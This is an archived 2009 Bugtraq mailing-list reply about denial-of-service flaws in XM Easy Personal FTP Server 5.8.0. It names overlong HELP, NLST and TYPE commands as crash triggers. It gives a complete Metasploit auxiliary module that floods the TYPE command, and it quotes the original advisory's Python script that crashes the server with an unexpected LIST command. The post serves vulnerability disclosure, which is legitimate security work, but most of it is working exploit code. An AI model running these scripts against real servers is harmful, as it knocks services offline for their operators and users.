| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Tue, 10 Nov 2009 13:37:54 -0800 (PST)
From: Protek Research Lab <protekresearchlab@...oo.ca>
To: bugtraq@...urityfocus.com, zhangmc@...l.ustc.edu.cn
Subject: Re: XM Easy Personal FTP Server 'LIST' Command Remote DoS Vulnerability
Hi,
It's seem to have much more bugs then what you listed in your advisory.
It's possible to DoS the server with this 3 others commands;
HELP ('A' * 90000)
NLST ('A' * 90000)
TYPE ('A' * 90000)
Here is an auxiliary module for metasploit...
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Ftp
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
'Name' => 'XM Easy Personal FTP Server 5.8.0 Type DoS',
'Description' => %q{
You need a valid login to DoS this FTP server, but
even anonymous can do it as long as it has permission
to call Type.
},
'Author' => 'Francis Provencher, Protek Research Lab',
'License' => MSF_LICENSE,
'Version' => '$Revision: 1 $',
'References' => [
[ 'URL', ' http://protekresearch.blogspot.com]
],
'DisclosureDate' => '2009/11/10')
)
# They're required
register_options([
OptString.new('FTPUSER', [ true, 'Valid FTP username', 'anonymous' ]),
OptString.new('FTPPASS', [ true, 'Valid FTP password for username', 'anonymous' ])
])
end
def run
return unless connect_login
raw_send_recv("TYPE #{'A' * 90000}\r\n")
disconnect
print_status("OK, server may still be technically listening, but it won't respond")
end
end
have a nice Day!
--- On Tue, 11/10/09, zhangmc@...l.ustc.edu.cn <zhangmc@...l.ustc.edu.cn> wrote:
> From: zhangmc@...l.ustc.edu.cn <zhangmc@...l.ustc.edu.cn>
> Subject: XM Easy Personal FTP Server 'LIST' Command Remote DoS Vulnerability
> To: bugtraq@...urityfocus.com
> Received: Tuesday, November 10, 2009, 3:07 AM
> Date of Discovery: 10-Nov-2009
>
> Credits:zhangmc[at]mail.ustc.edu.cn
>
> Vendor: Dxmsoft
>
> Affected:
> XM Easy Personal FTP Server 5.8.0
> Earlier versions may also be affected
>
> Overview:
> XM Easy Personal FTP Server is a easy use FTP server
> Application. Denial of service vulnerability exists in XM
> Personal FTP Server that causes the application to crash
> when the "LIST" is sent to FTP server if you do not use
> "PASV" or "POST" first.
>
> Details:
> XM Easy Personal FTP Server can't handle "LIST" command if
> you do not use "PASV" or "POST" first.If you have logged on
> the server successfully,a "LIST" command will lead the ftp
> server to crash.
>
> Severity:
> High
>
> Exploit example:
> #!/usr/bin/python
> import socket
> import sys
>
> def Usage():
> print ("Usage: ./expl.py
> <serv_ip> <Username>
> <password>\n")
> print ("Example:./expl.py 192.168.48.183
> anonymous anonymous\n")
> if len(sys.argv) <> 4:
> Usage()
> sys.exit(1)
> else:
> hostname=sys.argv[1]
> username=sys.argv[2]
> passwd=sys.argv[3]
> sock = socket.socket(socket.AF_INET,
> socket.SOCK_STREAM)
> try:
> sock.connect((hostname, 21))
> except:
> print ("Connection error!")
> sys.exit(1)
> r=sock.recv(1024)
> sock.send("user %s\r\n" %username)
> r=sock.recv(1024)
> sock.send("pass %s\r\n" %passwd)
> r=sock.recv(1024)
> sock.send("LIST\r\n")
> sock.close()
> sys.exit(0);
>
>
>
__________________________________________________________________
The new Internet Explorer® 8 - Faster, safer, easier. Optimized for Yahoo! Get it Now for Free! at http://downloads.yahoo.com/ca/internetexplorer/
Powered by blists - more mailing lists